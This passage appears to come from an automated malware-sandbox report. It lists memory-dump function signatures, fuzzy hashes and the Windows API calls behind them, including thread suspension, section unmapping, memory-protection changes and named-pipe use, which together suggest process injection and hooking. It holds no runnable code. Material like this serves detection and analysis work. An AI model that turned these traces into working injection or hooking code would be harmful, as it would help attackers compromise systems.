  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 29
  • API ID: HeapFreeRegisterWaitForSingleObjectRtlAllocateHeapmemcpy
  • String ID:
  • API String ID: 1976740423-0
  • Opcode ID: 00e719380342739fce2d9a83077352ae1e8e636be9c83fb6a114a482fd48beda
  • Instruction ID: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
  • Opcode Fuzzy Hash: 8CF059B0118943C9E83B20D21991BBEAB423F935CBC0E4631E40308A4F1E4762B63A98
  • Instruction Fuzzy Hash: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C665D
  • memcpy.NTDLL(00000018,?,?), ref: 001C6686
  • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_00005549,00000000,000000FF,00000008), ref: 001C66C5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C66D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 46
  • API ID: RtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleep
  • String ID:
  • API String ID: 522987270-0
  • Opcode ID: 8cc2b4e76e7c6786e8c4d2b22bf8b4b6a679c49f941b40daf46a87d1c8b23fb6
  • Instruction ID: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
  • Opcode Fuzzy Hash: 1BE0DF31184C8ACB405B38B05C420B38FA9EB522D184CDF63DC00A216CBA63316F5EAB
  • Instruction Fuzzy Hash: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
APIs
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
  • Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 34
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeaplstrcpy
  • String ID:
  • API String ID: 1604688484-0
  • Opcode ID: 70e1818195bd2f9c5871c2ad9b4977da4bf534850ba99953615b9ffad3aae1f3
  • Instruction ID: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
  • Opcode Fuzzy Hash: E6D0A7BC444902D50C5B6427845C238C64A6EA03F4D0C0316EE66761EF7F4366F1EF56
  • Instruction Fuzzy Hash: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
APIs
  • InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
  • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001D931B: wsprintfA.USER32 ref: 001D936D
  • lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001DB703: memset.NTDLL ref: 001DB75F
    • Part of subcall function 001DB703: memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
    • Part of subcall function 001DB703: RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
    • Part of subcall function 001DB703: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
    • Part of subcall function 001DB703: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
    • Part of subcall function 001DB703: CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
    • Part of subcall function 001DB703: GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
Memory Dump Source
